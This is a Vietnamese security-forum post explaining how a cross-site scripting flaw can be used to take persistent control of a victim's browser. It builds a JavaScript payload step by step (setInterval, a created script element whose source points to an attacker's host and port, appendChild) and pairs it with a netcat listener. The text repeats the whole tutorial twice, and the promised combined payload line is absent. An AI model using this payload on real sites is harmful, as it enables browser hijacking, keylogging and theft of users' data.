DDos
VIP Members
-
22/10/2013
-
524
-
2.191 bài viết
Kiểm soát trình duyệt của nạn nhân thông qua lỗi XSS
Trong suy nghĩ của khá nhiều người, XSS chỉ nằm ở việc ăn cắp cookie, hijacking tài khoản của người dùng... Nhưng sự nguy hiểm của XSS không dừng lại ở đó. Với XSS, kẻ tấn công có thể thu thập thông tin của người dùng, sử dụng như keylogger, scan hệ thống mạng của nạn nhân, nguy hiểm hơn nếu nó là stored-xss. Bởi với stored-xss, kẻ tấn công có thể tạo sâu máy tính, hoặc RCE. Trong bài viết này, mình sẽ mô phỏng cách dùng XSS để kiểm soát trình duyệt của nạn nhân.
Ý tưởng của dòng code được diễn tả như dưới đây:
+ javascript code:
setInterval(code,0)
+ Một hàm javascript để đoạn code chạy và giữ việc kết nối
function(){code}
+ Nhóm các code trong hàm javascript để làm cho setInterval() làm việc
d=document;
+ một lệnh gán tới code:
z=d.createElement("script");
+ Tạo thành phần của script.
z.src="//HOSTORT";
+ gán một nguồn tới thành phần của script với cặp giá trị HOSTORT, mà nó được sử dụng từ máy tính mà nó sẽ kiểm soát trình duyệt
d.body.appendChild(z)
Tổ hợp lại các bước trên ta được dòng code như dưới đây:
Bây giờ chúng chỉ cần sử dụng netcat để nghe trên cổng mà ta đã thiết lập ở bước trên.
Để rõ hơn các bạn có thể xem video dưới đây.
[video=youtube;CqiKGcrZ9NA]https://www.youtube.com/watch?v=CqiKGcrZ9NA[/video]
Ý tưởng của dòng code được diễn tả như dưới đây:
+ javascript code:
setInterval(code,0)
+ Một hàm javascript để đoạn code chạy và giữ việc kết nối
function(){code}
+ Nhóm các code trong hàm javascript để làm cho setInterval() làm việc
d=document;
+ một lệnh gán tới code:
z=d.createElement("script");
+ Tạo thành phần của script.
z.src="//HOSTORT";
+ gán một nguồn tới thành phần của script với cặp giá trị HOSTORT, mà nó được sử dụng từ máy tính mà nó sẽ kiểm soát trình duyệt
d.body.appendChild(z)
Tổ hợp lại các bước trên ta được dòng code như dưới đây:
Bây giờ chúng chỉ cần sử dụng netcat để nghe trên cổng mà ta đã thiết lập ở bước trên.
Để rõ hơn các bạn có thể xem video dưới đây.
[video=youtube;CqiKGcrZ9NA]https://www.youtube.com/watch?v=CqiKGcrZ9NA[/video]
Chỉnh sửa lần cuối bởi người điều hành: